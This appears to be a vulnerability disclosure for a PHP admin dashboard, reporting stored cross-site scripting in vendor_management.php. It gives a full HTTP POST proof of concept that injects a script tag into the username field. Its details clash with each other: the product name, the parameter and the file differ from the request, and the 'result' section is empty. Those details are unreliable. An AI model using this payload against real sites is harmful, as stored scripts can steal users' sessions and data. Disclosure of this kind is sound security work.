# admin-dashboard-in-php has Cross Site Scripting vulnerability in vendor_management.php ## supplier https://code-projects.org/admin-dashboard-in-php-with-source-code/ ## describe In vendor_management.php.There are unrestricted cross site scripting attacks and injection attacks in the farmacia-in-php. The controllable parameters are as follows: nome parameter. This function will execute the user parameter without restriction into the echo statement. Malicious attackers can exploit this vulnerability to obtain sensitive information from clients ## Code analysis   Querying and storing data from the database directly and echo out it without filter, resulting in the execution of XSS statements. ## payload ``` POST /manage_vendor_management.php?id=10 HTTP/1.1 Host: 192.168.0.143 Content-Length: 581 Cache-Control: max-age=0 Accept-Language: en-US Upgrade-Insecure-Requests: 1 Origin: http://192.168.0.143 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarych1t3gqxdF9mynkp User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.0.143/manage_vendor_management.php?id=10 Accept-Encoding: gzip, deflate, br Cookie: PHPSESSID=d1jciqajn87pvfbeddsdhi29rf Connection: keep-alive ------WebKitFormBoundarych1t3gqxdF9mynkp Content-Disposition: form-data; name="username" <script>alert(1)</script> ------WebKitFormBoundarych1t3gqxdF9mynkp Content-Disposition: form-data; name="password" Pandey ------WebKitFormBoundarych1t3gqxdF9mynkp Content-Disposition: form-data; name="email" shivangi050mca20@igdtuw.ac.in ------WebKitFormBoundarych1t3gqxdF9mynkp Content-Disposition: form-data; name="mobile" 123456789 ------WebKitFormBoundarych1t3gqxdF9mynkp Content-Disposition: form-data; name="submit" ------WebKitFormBoundarych1t3gqxdF9mynkp-- ``` ## result